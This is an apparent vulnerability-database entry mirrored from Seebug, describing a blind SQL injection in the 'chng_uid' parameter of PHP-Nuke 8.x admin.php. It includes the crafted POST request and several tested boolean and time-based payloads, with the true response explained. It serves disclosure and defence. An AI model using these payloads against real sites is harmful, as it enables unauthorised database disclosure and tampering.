Lucene search
K

PHP-Nuke 8.x <= "chng_uid" Blind SQL Injection Vulnerability

🗓️ 28 Mar 2011 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 26 Views

PHP-Nuke 8.x "chng_uid" Blind SQL Injection Vulnerability. Web Portal System for news distribution and article discussion. Unsanitized "chng_uid" parameter in /admin.php allows SQL injection leading to data manipulation/disclosur

Code

                                                => /admin.php

POST /admin.php HTTP/1.1
Referer: http://localhost/admin.php?op=mod_users
Content-Type: application/x-www-form-urlencoded
Host: localhost

chng_uid=[BLIND_SQL_INJECTION]+&op=modifyUser


Tested Payloads:
' or 1=1-- [TRUE]
' or 1=2-- [FALSE]
' or substring(@@version,1,1)=5--  [TRUE if mySQL version is 5.x]
' or substring(@@version,1,1)=4--  [FALSE if mySQL version is 5.x]
' or SLEEP(15)=0-- [sleep for 15 seconds]

Successful response (True) returns the user update form page.
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation